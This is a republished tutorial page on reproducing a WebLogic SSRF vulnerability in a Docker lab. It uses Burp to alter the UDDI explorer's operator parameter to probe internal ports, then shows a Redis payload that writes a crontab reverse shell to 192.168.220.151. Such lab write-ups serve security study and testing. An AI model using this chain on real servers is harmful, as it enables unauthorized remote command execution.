Community
Learn
Tools Library
AI Tools
Leisure
search
English
Home > Operation and Maintenance > Safety > How to Reproduce Weblogic SSRF Vulnerability

How to Reproduce Weblogic SSRF Vulnerability

王林
Release: 2023-05-14 20:04:04
forward
1436 people have browsed it

1. Use docker to build an environment

Docker installation and environment building tutorial: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

Access port 7001如何实现Weblogic SSRF漏洞复现

2. Vulnerability reproduction steps

1. Vulnerability page/uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2. Check IBM.

如何实现Weblogic SSRF漏洞复现

It is found that there is a connection, so there may be ssrf.

3. Use burp suite to capture packets. Click Search

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

4. Modify the connection of operator parameters

如何实现Weblogic SSRF漏洞复现

##5. Access result

Accessing a non-existing port returns could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

Accessing an existing port returns a status code

如何实现Weblogic SSRF漏洞复现

Access the intranet

如何实现Weblogic SSRF漏洞复现

Use redis to rebound the shell payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
Copy after login

The above is the detailed content of How to Reproduce Weblogic SSRF Vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
weblogic ssrf
source:yisu.com
Previous article:How to implement a mapped array without map() in Javascript Next article:How to fix net use 1231 error
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
function_exists() cannot determine the custom function Function test () {return true;} if (function_exists ('test')) {echo "test is function...
From 2024-04-29 11:01:01
0
3
2399
How to display the mobile version of Google Chrome Hello teacher, how can I change Google Chrome into a mobile version?
From 2024-04-23 00:22:19
0
11
2529
The child window operates the parent window, but the output does not respond. The first two sentences are executable, but the last sentence cannot be implemented.
From 2024-04-19 15:37:47
0
1
2146
There is no output in the parent window document.onclick = function(){ window.opener.document.write('I am the output of the child ...
From 2024-04-18 23:52:34
0
1
2021
Where is the courseware about CSS mind mapping? Courseware
From 2024-04-16 10:10:18
0
0
2101
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template